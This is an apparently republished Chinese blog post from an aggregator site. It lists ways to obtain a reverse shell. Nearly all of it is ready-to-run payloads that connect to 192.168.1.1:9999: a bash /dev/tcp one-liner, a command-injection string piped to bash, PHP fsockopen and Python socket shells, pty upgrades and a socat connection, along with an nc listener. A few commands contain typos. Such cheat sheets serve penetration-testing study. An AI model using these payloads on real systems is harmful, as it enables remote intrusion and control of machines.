反弹shell

Posted 提名-UTF_8

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了反弹shell相关的知识,希望对你有一定的参考价值。

反弹 shell的几种方式

linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:

bash反弹 shell

靶机:

bash -I >&/dev/tcp/192.168.1.1/9999 0>&1

攻击机:

nc -nvlp 9999

命令注入直接获取一个shell

127.0.0.1&echo 'bash -i >&/dev/tcp/192.168.1.1,9999 0>&1' | bash

调用python直接获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

使用php建立 socket会话:

正向连接:

php -r '$sock=fsockopen("192.168.1.1",9999);exec("/bin/bash -i <&3 >&3 2>&3");'

反向连接:

php -r '$sock=fsockopen("192.168.1.1",9999);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

python建立socket会话

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

获取一个 交互式的 shell

Python -c 'import pty;pty spawn("/bin/bash")'

socat建立连接

socat exec:'bash -i',pty,stderr,setsid,sigint,sane tcp:"192.168.1.1",9999

以上是关于反弹shell的主要内容,如果未能解决你的问题,请参考以下文章

Windows反弹shell方法总结

mshta 反弹shell

【安全记录】反弹shell小记

Linux/Windows反弹shell

反弹shell小结

反弹shell学习总结